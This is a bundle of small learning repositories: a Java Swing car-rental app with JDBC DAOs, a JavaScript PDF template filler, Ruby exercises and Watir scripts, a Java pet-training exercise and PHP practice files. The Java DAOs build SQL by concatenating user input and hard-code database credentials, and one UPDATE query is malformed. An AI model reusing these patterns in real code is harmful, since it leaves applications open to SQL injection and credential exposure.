JOptionPane.showMessageDialog(null, "Erro de conexão ao banco", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } } catch (Exception e) { Logger.getLogger(ExibirTipoVeiculo.class.getName()).log(Level.SEVERE, null, e); } } } public static DefaultTableModel buildTableModel(ResultSet rs) throws SQLException { ResultSetMetaData metaData = rs.getMetaData(); // names of columns Vector<String> columnNames = new Vector<String>(); int columnCount = metaData.getColumnCount(); for (int column = 1; column <= columnCount; column++) { columnNames.add(metaData.getColumnName(column)); } // data of the table Vector<Vector<Object>> data = new Vector<Vector<Object>>(); while (rs.next()) { 
Vector<Object> vector = new Vector<Object>(); for (int columnIndex = 1; columnIndex <= columnCount; columnIndex++) { vector.add(rs.getObject(columnIndex)); } data.add(vector); } return new DefaultTableModel(data, columnNames); } private javax.swing.JButton bBuscar; private javax.swing.JButton bBuscarTodos; private javax.swing.JButton bDeletar; private javax.swing.JLabel jLabel1; private javax.swing.JLabel jLabel4; private javax.swing.JPanel jPanel2; private javax.swing.JScrollPane jScrollPane1; private javax.swing.JTable tableModelo; private javax.swing.JTextField tdCodigo; } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/view/ExibirMarca.java package net.danielpaz.pucc.poo.trabalho.view; import java.sql.ResultSet; import java.sql.ResultSetMetaData; import java.sql.SQLException; import java.util.ArrayList; import java.util.List; import java.util.Vector; import java.util.logging.Level; import java.util.logging.Logger; import javax.swing.JOptionPane; import javax.swing.JTable; import javax.swing.table.DefaultTableModel; import javax.swing.table.TableModel; import net.danielpaz.pucc.poo.trabalho.conexao.*; import net.danielpaz.pucc.poo.trabalho.control.Marca; import net.danielpaz.pucc.poo.trabalho.model.*; public class ExibirMarca extends javax.swing.JPanel { /** * Creates new form ModeloLayout */ public ExibirMarca() { initComponents(); } private void initComponents() { jPanel2 = new javax.swing.JPanel(); jLabel1 = new javax.swing.JLabel(); jLabel4 = new javax.swing.JLabel(); tdCodigo = new javax.swing.JTextField(); bBuscar = new javax.swing.JButton(); jScrollPane1 = new javax.swing.JScrollPane(); tableMarca = new javax.swing.JTable(); bBuscarTodos = new javax.swing.JButton(); bDeletar = new javax.swing.JButton(); setBackground(new java.awt.Color(255, 255, 255)); jPanel2.setBackground(new java.awt.Color(255, 255, 255)); jLabel1.setFont(new java.awt.Font("Arial", 1, 18)); // NOI18N jLabel1.setText("Exibir Marca"); jLabel4.setFont(new java.awt.Font("Arial", 0, 12)); // 
NOI18N jLabel4.setText("Código"); tdCodigo.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { tdCodigoActionPerformed(evt); } }); bBuscar.setBackground(new java.awt.Color(255, 255, 255)); bBuscar.setText("BUSCAR"); bBuscar.setFocusable(false); bBuscar.setHorizontalTextPosition(javax.swing.SwingConstants.CENTER); bBuscar.setVerticalTextPosition(javax.swing.SwingConstants.BOTTOM); bBuscar.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bBuscarActionPerformed(evt); } }); tableMarca.setModel(new javax.swing.table.DefaultTableModel( new Object [][] { {null, null} }, new String [] { "Codigo", "Descrição" } )); jScrollPane1.setViewportView(tableMarca); bBuscarTodos.setBackground(new java.awt.Color(255, 255, 255)); bBuscarTodos.setText("BUCAR TODOS"); bBuscarTodos.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bBuscarTodosActionPerformed(evt); } }); bDeletar.setBackground(new java.awt.Color(255, 255, 255)); bDeletar.setText("DELETAR"); bDeletar.addActionListener(new java.awt.event.ActionListener() { public void actionPerformed(java.awt.event.ActionEvent evt) { bDeletarActionPerformed(evt); } }); javax.swing.GroupLayout jPanel2Layout = new javax.swing.GroupLayout(jPanel2); jPanel2.setLayout(jPanel2Layout); jPanel2Layout.setHorizontalGroup( jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(75, 75, 75) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(jLabel1) .addGroup(jPanel2Layout.createSequentialGroup() .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) 
.addComponent(jLabel4) .addComponent(bBuscar)) .addGap(44, 44, 44) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addComponent(bBuscarTodos) .addGap(51, 51, 51) .addComponent(bDeletar)) .addComponent(tdCodigo, javax.swing.GroupLayout.PREFERRED_SIZE, 103, javax.swing.GroupLayout.PREFERRED_SIZE)))) .addContainerGap(196, Short.MAX_VALUE)) .addGroup(jPanel2Layout.createSequentialGroup() .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(0, 0, Short.MAX_VALUE)))) ); jPanel2Layout.setVerticalGroup( jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(jPanel2Layout.createSequentialGroup() .addGap(24, 24, 24) .addComponent(jLabel1) .addGap(33, 33, 33) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(jLabel4) .addComponent(tdCodigo, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE)) .addGap(38, 38, 38) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addComponent(bBuscar) .addGroup(jPanel2Layout.createParallelGroup(javax.swing.GroupLayout.Alignment.BASELINE) .addComponent(bBuscarTodos) .addComponent(bDeletar))) .addGap(54, 54, 54) .addComponent(jScrollPane1, javax.swing.GroupLayout.PREFERRED_SIZE, 318, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(0, 140, Short.MAX_VALUE)) ); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(this); this.setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, 
javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(20, 20, 20)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE) .addComponent(jPanel2, javax.swing.GroupLayout.PREFERRED_SIZE, javax.swing.GroupLayout.DEFAULT_SIZE, javax.swing.GroupLayout.PREFERRED_SIZE) .addGap(20, 20, 20)) ); } public static DefaultTableModel buildTableModel(ResultSet rs) throws SQLException { ResultSetMetaData metaData = rs.getMetaData(); // names of columns Vector<String> columnNames = new Vector<String>(); int columnCount = metaData.getColumnCount(); for (int column = 1; column <= columnCount; column++) { columnNames.add(metaData.getColumnName(column)); } // data of the table Vector<Vector<Object>> data = new Vector<Vector<Object>>(); while (rs.next()) { Vector<Object> vector = new Vector<Object>(); for (int columnIndex = 1; columnIndex <= columnCount; columnIndex++) { vector.add(rs.getObject(columnIndex)); } data.add(vector); } return new DefaultTableModel(data, columnNames); } private void bBuscarActionPerformed(java.awt.event.ActionEvent evt) { if(tdCodigo.getText().isEmpty()) { JOptionPane.showMessageDialog(null, "Por favor informe o código !", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); Marca marca = new Marca (Integer.parseInt(tdCodigo.getText())); int auxMarca = marca.getIdMarca(); MarcaDAO marcaDAO = new MarcaDAO(bd); Marca m = marcaDAO.getMarca(auxMarca); tableMarca.getModel().setValueAt(m.getIdMarca(), 0, 0); tableMarca.getModel().setValueAt(m.getDescricaoMarca(), 0, 1); } catch (Exception ex) { Logger.getLogger(ExibirMarca.class.getName()).log(Level.SEVERE, null, ex); } } private void tdCodigoActionPerformed(java.awt.event.ActionEvent 
evt) { } private void bBuscarTodosActionPerformed(java.awt.event.ActionEvent evt) { try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); MarcaDAO marcaDAO = new MarcaDAO(bd); ResultSet resultado = marcaDAO.getMarca(); TableModel tblModel = buildTableModel(resultado); tableMarca.setModel(tblModel); } catch (Exception e) { Logger.getLogger(ExibirMarca.class.getName()).log(Level.SEVERE, null, e); } } private void bDeletarActionPerformed(java.awt.event.ActionEvent evt) { if(tableMarca.getSelectedRowCount() > 0) { try { BD bd = new BD ("oracle.jdbc.driver.OracleDriver","jdbc:oracle:thin:@localhost:1521:xe","system", "poo2014"); MarcaDAO marcaDAO = new MarcaDAO(bd); for (int i : tableMarca.getSelectedRows()) { Object marcaDeletar = tableMarca.getValueAt(i, 0); String marcaDesc = (String) tableMarca.getValueAt(i, 1); int resposta; resposta = JOptionPane.showConfirmDialog(null, "Deseja deletar a Marca " +marcaDesc + "?"); if (resposta == JOptionPane.YES_OPTION) { marcaDAO.excluir(marcaDeletar); } else { return; } } bd.fecharConexao(); if (bd.sucessoBanco(true)) { JOptionPane.showMessageDialog(null, "Registros deletados com sucesso !", TOOL_TIP_TEXT_KEY, WIDTH, null); } else { JOptionPane.showMessageDialog(null, "Erro de conexão ao banco", TOOL_TIP_TEXT_KEY, WIDTH, null); return; } } catch (Exception e) { Logger.getLogger(ExibirMarca.class.getName()).log(Level.SEVERE, null, e); } } } private javax.swing.JButton bBuscar; private javax.swing.JButton bBuscarTodos; private javax.swing.JButton bDeletar; private javax.swing.JLabel jLabel1; private javax.swing.JLabel jLabel4; private javax.swing.JPanel jPanel2; private javax.swing.JScrollPane jScrollPane1; private javax.swing.JTable tableMarca; private javax.swing.JTextField tdCodigo; }<file_sep>/src/net/danielpaz/pucc/poo/trabalho/model/UsuarioDAO.java package net.danielpaz.pucc.poo.trabalho.model; import java.sql.ResultSet; import 
net.danielpaz.pucc.poo.trabalho.conexao.BD; import net.danielpaz.pucc.poo.trabalho.control.Usuario; public class UsuarioDAO { private BD bd; public UsuarioDAO (BD bd) throws Exception { if (bd==null) throw new Exception ("Acesso a BD nao fornecido"); this.bd = bd; } public boolean cadastrado (int codigo) throws Exception { String qry; qry = "SELECT * FROM Usuario WHERE IdUsuario=" +codigo; ResultSet resultado = bd.execConsulta (qry); return resultado.first(); } public void incluir (Usuario usuario) throws Exception { if (usuario==null) throw new Exception ("Usuario nao fornecido"); String cmd; cmd = "INSERT INTO Usuario (IdUsuario, Nome, Email) VALUES (" +usuario.getCodigo() +", '" +usuario.getNome() +"', '" +usuario.getEmail() +"')"; bd.execComando (cmd); } public void excluir (Object cod) throws Exception { int codigo = Integer.valueOf(cod.toString()); if (codigo <= 0) throw new Exception ("Codigo invalido"); if (!cadastrado (codigo)) throw new Exception ("Codigo nao cadastrado"); String cmd; cmd = "DELETE FROM Usuario WHERE IdUsuario=" + codigo; bd.execComando (cmd); } public void alterar (Usuario usuario) throws Exception { if (usuario==null) throw new Exception ("Usuario nao fornecido"); if (!cadastrado (usuario.getCodigo())) throw new Exception ("Usuario nao cadastrado"); String cmd; cmd = "UPDATE Usuario SET Nome= '" +usuario.getNome() + "', Email='" +usuario.getEmail() + "' WHERE IdUsuario=" +usuario.getCodigo(); bd.execComando (cmd); } public Usuario getUsuario (int codigo) throws Exception { if (codigo <= 0) throw new Exception ("Codigo invalido"); String qry; qry = "SELECT * FROM Usuario WHERE IdUsuario=" + codigo; ResultSet resultado = bd.execConsulta (qry); if (!resultado.first()) throw new Exception ("Codigo nao cadastrado"); Usuario usuario = new Usuario (resultado.getInt("IdUsuario") ,resultado.getString("Nome"), resultado.getString("Email")); return usuario; } public ResultSet getUsuario () throws Exception { String qry; qry = "SELECT * FROM 
Usuario"; ResultSet resultado; try { resultado = bd.execConsulta (qry); } catch (Exception e) { throw new Exception ("Problema de acesso ao BD"); } return resultado; } } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/model/MarcaDAO.java package net.danielpaz.pucc.poo.trabalho.model; import java.sql.ResultSet; import net.danielpaz.pucc.poo.trabalho.conexao.BD; import net.danielpaz.pucc.poo.trabalho.control.Marca; public class MarcaDAO { private BD bd; public MarcaDAO (BD bd) throws Exception { if (bd==null) throw new Exception ("Acesso a BD nao fornecido"); this.bd = bd; } public boolean cadastrado (int codigo) throws Exception { String qry; qry = "SELECT * FROM Marca WHERE IdMarca=" +codigo; ResultSet resultado = bd.execConsulta (qry); return resultado.first(); } public void incluir (Marca marca) throws Exception { if (marca==null) throw new Exception ("Marca nao fornecida"); String cmd; cmd = "INSERT INTO Marca (IdMarca, Descricao) VALUES (" +marca.getIdMarca() +", '"+marca.getDescricaoMarca()+"')"; bd.execComando (cmd); } public void excluir (Object cod) throws Exception { int codigo = Integer.valueOf(cod.toString()); if (codigo <= 0) throw new Exception ("Codigo invalido"); if (!cadastrado (codigo)) throw new Exception ("Codigo nao cadastrado"); String cmd; cmd = "DELETE FROM Marca WHERE IdMarca=" +codigo; bd.execComando (cmd); } public void alterar (Marca marca) throws Exception { if (marca==null) throw new Exception ("Marca nao fornecida"); if (!cadastrado (marca.getIdMarca())) throw new Exception ("Marca nao cadastrada"); String cmd; cmd = "UPDATE Marca SET Descricao=" + "'" + marca.getDescricaoMarca() + ", ' " + "WHERE IdMarca=" + marca.getIdMarca(); bd.execComando (cmd); } public Marca getMarca (int codigo) throws Exception { if (codigo <= 0) throw new Exception ("Codigo invalido"); String qry; qry = "SELECT * FROM Marca WHERE IdMarca=" + codigo; ResultSet resultado = bd.execConsulta (qry); if (!resultado.first()) throw new Exception ("Codigo nao 
cadastrado"); Marca marca; marca = new Marca (resultado.getInt("IdMarca"), resultado.getString("Descricao")); return marca; } public Marca getMarca (String desc) throws Exception { if (desc == null || desc.equals("")) throw new Exception ("Descricao invalido"); String qry; qry = "SELECT * FROM Marca WHERE Descricao= '" +desc + "'"; ResultSet resultado = bd.execConsulta (qry); if (!resultado.first()) throw new Exception ("Descricao nao cadastrado"); Marca marca = new Marca (resultado.getInt("IdMarca"), resultado.getString("Descricao")); return marca; } public ResultSet getMarca () throws Exception { String qry; qry = "SELECT * FROM Marca"; ResultSet resultado; try { resultado = bd.execConsulta (qry); } catch (Exception e) { throw new Exception ("Problema de acesso ao BD"); } return resultado; } } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/control/TipoVeiculo.java package net.danielpaz.pucc.poo.trabalho.control; public class TipoVeiculo { protected int codigo; protected float preco; protected String descricao; public void setCodigo (int codigo) throws Exception { if (codigo <= 0) throw new Exception ("Codigo invalido"); this.codigo = codigo; } public void setDescricao (String descricao) throws Exception { if (descricao==null || descricao.equals("")) throw new Exception ("Descricao nao fornecida"); this.descricao = descricao; } public void setPreco (float preco) throws Exception { if (preco <= 0) throw new Exception ("Marca invalido"); this.preco = preco; } public int getCodigo () { return this.codigo; } public String getDescricao () { return this.descricao; } public float getPreco () { return this.preco; } public TipoVeiculo (int codigo, float preco, String descricao) throws Exception { this.setCodigo (codigo); this.setPreco(preco); this.setDescricao (descricao); } public TipoVeiculo (float preco, String descricao) throws Exception { this.setPreco(preco); this.setDescricao (descricao); } public TipoVeiculo (int codigo) throws Exception { this.setCodigo (codigo); 
} } <file_sep>/src/net/danielpaz/pucc/poo/trabalho/control/Agendamento.java package net.danielpaz.pucc.poo.trabalho.control; public class Agendamento { private int codigo; private int usuario; private String data; private int veiculo; private int caucao; private String dataFinal; private float valorAluguel; public Agendamento (int codigo) { this.setCodigo(codigo); } public Agendamento (int codigo, int veiculo, int usuario, String data, String dataFinal, float valorAlguel, int caucao) { this.setCodigo(codigo); this.setVeiculo(veiculo); this.setUsuario(usuario); this.setData(data); this.setDataFinal(dataFinal); this.setValorAluguel(valorAlguel); this.setCaucao(caucao); adicionaValorCaucao(caucao,valorAlguel); } public int getCodigo() { return codigo; } public void setCodigo(int codigo) { this.codigo = codigo; } public int getUsuario() { return usuario; } public void setUsuario(int usuario) { this.usuario = usuario; } public int getVeiculo() { return veiculo; } public void setVeiculo(int veiculo) { this.veiculo = veiculo; } public String getDataFinal() { return dataFinal; } public void setDataFinal(String dataFinal) { this.dataFinal = dataFinal; } public String getData() { return this.data; } public void setData(String data) { this.data = data; } public int getCaucao() { return this.caucao; } public void setCaucao(int caucao) { this.caucao = caucao; } public float getValorAluguel() { return valorAluguel; } public void setValorAluguel(float valorAluguel) { this.valorAluguel = valorAluguel; } /** * Metodo que adiciona 10% do valor do alguel se for adicionado caucao * @param caucao - caucao * @param valorAlguel - valor do alguel */ public void adicionaValorCaucao (int caucao, float valorAluguel) { if (caucao == 1) { float valorComCaucao = (float) (valorAluguel + (valorAluguel * 0.1)); setValorAluguel(valorComCaucao); } } }
b629caa5ca260167629ba1599e153039407fc2b3
[ "Java" ]
8
Java
LuisEduardoER/locadoradeveiculospucc
3d239c478b21d463dd05f36c24b159aeb2717b4d
971d00982159c8d79cf86d15332b7dd433730c91
refs/heads/master
<file_sep> def ask_first_name puts "Would the fountain of your mind were clear again, that I might water an ass at it. Also, what's your first name?" gets.chomp end def ask_last_name puts "Thou art the son and heir of a mongrel bitch. Also, what's your last name?" gets.chomp end def greeting(first, last) puts "Hello, #{first} #{last} thou hath more hair than wit, and more faults than hairs, and more wealth than faults." end first = ask_first_name last = ask_last_name greeting(first, last) <file_sep>def questions_and_answers questions = { qname: "What is your name?", qhair: "What color is your hair?", qmovie: "What is your favorite movie (right now)?" } answers = {} puts questions[:qname] answer_1 = gets.chomp # initially I did answers[:aname] = gets.chomp but I couldn't get it to run. answers[:aname] = answer_1 # So that's why I stored the user input into a variable puts questions[:qhair] answer_2 = gets.chomp answers[:ahair] = answer_2 puts questions[:qmovie] answer_3 = gets.chomp answers[:amovie] = answer_3 sentence(answers[:aname], answers[:ahair], answers[:amovie]) end def sentence(name, hair_color, movie) puts "#{name} has #{hair_color} hair and her favorite movie is #{movie}" end questions_and_answers <file_sep>def questions_and_answers questions = { name: "What is your name?", hair: "What color is your hair?", movie: "What is your favorite movie (right now)?" } answers = {} questions.each do |key, value| puts value answers[key] = gets.chomp end sentence(answers[:name], answers[:hair], answers[:movie]) end def sentence(name, hair, movie) puts "#{name} has #{hair} hair and her favorite movie is #{movie}" end questions_and_answers <file_sep> def ask_first_name puts "Would the fountain of your mind were clear again, that I might water an ass at it. Also, what's your first name?" gets.chomp end def ask_last_name puts "Thou art the son and heir of a mongrel bitch. Also, what's your last name?" 
gets.chomp end def greeting puts "Hello, #{ask_first_name} #{ask_last_name},thou hath more hair than wit, and more faults than hairs, and more wealth than faults." end greeting #<file_sep>def ask_number puts 'Give me a number, any number' gets.chomp end def turn_into_integer(number_string) number_1 = number_string.to_i end def do_math_things(number) number_2 = number + 5 number_2 *= 2 number_2 -= 4 number_2 /= 2 final_number = number_2 - number puts "Congrats, you ended up with #{final_number} again!" end number_string = ask_number number = turn_into_integer(number_string) do_math_things(number) <file_sep>class PlatonicPerson def talk_about_self(name, calling) puts "My name is, #{name}, and I am a #{calling}" end def list characters = { 'a' => '<NAME>', 'b' => 'Sappho of Lesbos', 'c' => 'Archimedes', 'd' => 'Telesilla of Argos', 'e' => 'Thargelia of Miletus', 'f' => 'Demetrius of Thessaloniki' } puts 'Choose from one of the following characters: (type a, b, c...etc)' characters.each do |k, v| puts "#{k}) #{v}" end end def choose_person(characters) selection = gets.chomp name = characters[selection] end def ask_and_answer(question) puts question gets.chomp end def platonics traits = {} bravery = ask_and_answer("Rate your character's bravery from 1-10") traits[:bravery] = bravery.to_i rationality = ask_and_answer("Rate your character's rationality from 1-10") traits[:rationality] = rationality.to_i eloquence = ask_and_answer("Rate your character's verbal eloquence from 1-10") traits[:verbal_eloquence] = eloquence.to_i physical_strength = ask_and_answer("Rate your character's physical strength from 1-10") traits[:physical_strength] = physical_strength.to_i traits end def main_trait(platonics_hash) # Find the trait with the highest rating max_value = platonics_hash.values.max trait = platonics_hash.key(max_value) trait.to_s end def calling(trait) puts trait.class case trait when 'bravery' 'infantry' when 'rationality' 'philosopher' when 'eloquence' 'priest' when 
'physical_strength' 'chariot_racer' else 'peasant' end end end pp = PlatonicPerson.new pp_list = pp.list name = pp.choose_person(pp_list) pp_traits = pp.platonics puts pp_traits trait = pp.main_trait(pp_traits) calling = pp.calling(trait) pp.talk_about_self(name, calling) <file_sep># Learn Ruby Projects This repository contains several homework problems that I worked on while I was learning Ruby in the summer of 2017. I had a wonderful mentor named <NAME> that helped me learn Ruby on the job. At the time, I was a manual QA tester trying to transition to being in a QA Test Automation role. These exercises are basic and embarrassing (have to start somewhere!), but they helped me learn Ruby data structures and fundamentals that were crucial to master if I wanted to write automated test scripts. I'm choosing to keep this repository up because it's kind of a nice reminder that my abilities that I take as granted today were concepts I struggled with a few years ago. <file_sep> #locate login button by id and click, when the drop-down opens #click in the username text field and set username,click in #password field and set password, click login -- is when_present necessary? browser = Watir::Browser.new :chrome browser.goto('staging.taskeasy.com') browser.a(id: 'login-drop').when_present.click browser.input(id: 'displayName').set('<EMAIL>') browser.input(id: 'password').set('<PASSWORD>') browser.button(id: 'loginButton').click #write something that would check to see #if eric crimmins is still on the about us page browser = Watir::Browser.new :chrome browser.goto('taskeasy.com/about/') eric = browser.div(id: 'our_leadership').text.include?('<NAME>') if eric == true puts "Yay! Eric still works here!" else puts "I blame Coral's machiavellian scheme." end <file_sep>def ask_for_name questions = ["Would the fountain of your mind were clear again, that I might water an ass at it. Also, what's your first name?", "Thou art the son and heir of a mongrel bitch. 
Also, what's your last name?"] names = [] questions.each do |question| puts question names << gets.chomp end greeting(names[0], names[1]) end def greeting(first, last) puts "Hello, #{first} #{last}, thou hath more hair than wit, and more faults than hairs, and more wealth than faults." end ask_for_name
bb91f28978dd9444ee4c233b19e7c9446a20f442
[ "Markdown", "Ruby" ]
9
Ruby
ameliakindall/projects
f5aafd86dcb855303d055cf9f3152a54d9e3e259
51ee660d6f321410942cafc209049a6495711c6d
refs/heads/master
<file_sep> public interface EstadoMascota { public void avanzarHasta(int x, int y, Mascota unaMascota); public void descansar(Mascota unaMascota); public void cambiarDeEstadoA(Mascota unaMascota); } <file_sep> public class Contenta implements EstadoMascota { public void avanzarHasta(int x, int y, Mascota unaMascota) { unaMascota.disminuirEnergiaEn(y); unaMascota.aumentarAnimoEn(2*(x+y)); if(estaDebilitada(unaMascota)) { cambiarDeEstadoA(unaMascota); } } private boolean estaDebilitada(Mascota unaMascota) { return (unaMascota.getEnergia()<40); } public void cambiarDeEstadoA(Mascota unaMascota) { unaMascota.cambiarEstado(new Cansada()); } public void descansar(Mascota unaMascota) { unaMascota.aumentarEnergiaEn(5); } } <file_sep> public abstract class Mascota { private int energia; private int animo; private int posicionEnX; private int posicionEnY; private EstadoMascota estado; protected Mascota() { super(); this.animo = 100; this.energia = 100; this.posicionEnX = 0; this.posicionEnY = 0; } public int getEnergia() { return energia; } public int getAnimo() { return animo; } public int getPosicionEnX() { return posicionEnX; } public int getPosicionEnY() { return posicionEnY; } public EstadoMascota getEstado() { return estado; } public void disminuirEnergiaEn(int unidades) { this.energia -= unidades; } public void aumentarEnergiaEn(int unidades) { this.energia += unidades; } public void aumentarAnimoEn(int unidades) { this.animo += unidades; } public void disminuirAnimoEn(int unidades) { this.animo -= unidades; } public void avanzarPosicion(int unidades, int unaPosicion) { unaPosicion+=unidades; } public void retrocederPosicion(int unidades, int unaPosicion) { unaPosicion-=unidades; } public void cambiarEstado(EstadoMascota unEstado) { this.estado = unEstado; } public void descansar() { this.estado.descansar(this); } public void avanzarHasta(int x, int y) { avanzarPosicion(x, getPosicionEnX()); avanzarPosicion(y, getPosicionEnY()); getEstado().avanzarHasta(x, y, this); } 
public boolean tenesHambre() { return true; } public boolean estasEnForma() { return false; } } <file_sep> import java.util.ArrayList; import java.util.List; import java.util.stream.Collectors; public class Entrenador { private String nombre; private int edad; private int posicionX; private int posicionY; private List<Mascota> mascotas; public Entrenador() { super(); this.mascotas = new ArrayList<>(); this.posicionX = 0; this.posicionY = 0; } public String getNombre() { return nombre; } public void setNombre(String nombre) { this.nombre = nombre; } public int getEdad() { return edad; } public void setEdad(int edad) { this.edad = edad; } public void agregar(Mascota unaMascota) { mascotas.add(unaMascota); } public void quitar(Mascota unaMascota) { mascotas.remove(unaMascota); } public void avanzarHasta(int unPuntoX, int unPuntoY) { this.posicionX += unPuntoX; this.posicionY += unPuntoY; } public void daleRespiroALosHambrientos() { List<Mascota> mascotasConHambre = mascotas.stream().filter(unaMascota -> unaMascota.tenesHambre()).collect(Collectors.toList()); mascotasConHambre.forEach(unaMascota -> unaMascota.descansar()); } public void entrenaMascotasHasta(int unPuntoX, int unPuntoY) { for(Mascota unaMascota : mascotas) { unaMascota.avanzarHasta(unPuntoX, unPuntoY); } avanzarHasta(unPuntoX, unPuntoY); } } //HOLAAAAAAAAAA
5e16aba73759b67864412e00b1b3c2095f47df55
[ "Java" ]
4
Java
gasgalarza/MiEntrenamientoMascotas
d1705ec290b56b37cad3ab93940184519a194e5b
598b7afda21e714ebf194c1edb5d752fbd0c130a
refs/heads/main
<repo_name>DifferDeveloper123/Engplate<file_sep>/index.js const useremail = document.getElementById("email"); const mobileNumber = document.getElementById("mobile number"); const whatsappNumber = document.getElementById("whatsapp number"); const address = document.getElementById("address"); const thought = document.getElementById("thought"); const submitBtn = document.getElementById("submitBtn"); const { PDFDocument, rgb, degrees } = PDFLib; const capitalize = (str, lower = false) => (lower ? str.toLowerCase() : str).replace(/(?:^|\s|["'([{])+\S/g, (match) => match.toUpperCase() ); submitBtn.addEventListener("click", () => { const val = capitalize(useremail.value); const mobVal = capitalize(mobileNumber.value); const whatsVal = capitalize(whatsappNumber.value); const addVal = capitalize(address.value); const thoughtVal = capitalize(thought.value); if (val.trim() !== "" && useremail.checkValidity() && mobVal.trim() !== "" && whatsVal.trim() !== "" && addVal.trim() !== "" && thoughtVal.trim() !== "") { generatePDF(val, mobVal, whatsVal, addVal, thoughtVal); } else { useremail.reportValidity(); mobileNumber.reportValidity(); whatsappNumber.reportValidity(); address.reportValidity(); } }); const generatePDF = async (email, mobile, whatsapp, address, thought) => { const existingPdfBytes = await fetch("./English Coaching.pdf").then((res) => res.arrayBuffer() ); const pdfDoc = await PDFDocument.load(existingPdfBytes); pdfDoc.registerFontkit(fontkit); const fontBytes = await fetch("./VarelaRound-Regular.ttf").then((res) => res.arrayBuffer() ); const VarelaRound = await pdfDoc.embedFont(fontBytes); const pages = pdfDoc.getPages(); const firstPage = pages[0]; firstPage.drawText(email, { x: 290, y: 300, size: 10, font: VarelaRound, color: rgb(1,1,1), }); firstPage.drawText(address, { x: 500, y: 300, size: 10, font: VarelaRound, color: rgb(1,1,1), }); firstPage.drawText(mobile, { x: 290, y: 235, size: 10, font: VarelaRound, color: rgb(1,1,1), }); firstPage.drawText(whatsapp, { 
x: 500, y: 235, size: 10, font: VarelaRound, color: rgb(1,1,1), }); firstPage.drawText(thought, { x: 350, y: 450, size: 35, font: VarelaRound, color: rgb(1,1,1), }); const pdfBytes = await pdfDoc.save(); console.log("Done creating"); var file = new File( [pdfBytes], "English Template.pdf", { type: "application/pdf;charset=utf-8", } ); saveAs(file); }; // init();
486f0d711611303851b105e8570f0434a0156aef
[ "JavaScript" ]
1
JavaScript
DifferDeveloper123/Engplate
87ed831aeac3837a12003d1142324c07a466f84a
19090e7fa0310118100386526b650fc13c565ec3
refs/heads/master
<repo_name>Yaroslav-Ivanov/first<file_sep>/wrk5.2.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php // обработка без секции $iniArray = parse_ini_file("file.ini"); print_r($iniArray); //обработка с секциями $iniArray = parse_ini_file("file.ini", true); print_r($iniArray); ?> </body> </html><file_sep>/new.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $money = 2000; $proc = 11.5; $stav = 1; // for (; $stav <= 14; $stav++) { // $money = $money + ($money * (($proc / 12) / 100 )); // } // echo $money; // while($stav <= 14){ // $money = $money + ($money * (($proc / 12) / 100 )); // $stav++; // } // echo $money; do{ $money = $money + ($money * (($proc / 12) / 100 )); $stav++; } while($stav <= 14); echo $money; ?> </body> </html><file_sep>/2header/1header3.php <?php header('Content-type: application/pdf'); header('Content-Disposition: attachment; filename="downloaded.pdf"'); readfile('original.pdf'); ?><file_sep>/2header/1header2.php <?php header('Location: http://tut.by/'); ?> <file_sep>/first.php <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Compatible" content="ie=edge"> <title>Document</title> </head> <body> <?php $a=3; echo "\$a=$a"; ?> <?php $arr = array("foo" => "bar", 12 => true); echo $arr["foo"]; echo $arr[12]; echo "<br>"; $arr = array("somearray" => array(6 => 5, 13 => 9, "a" => 42)); echo $arr["somearray"] [6]; echo 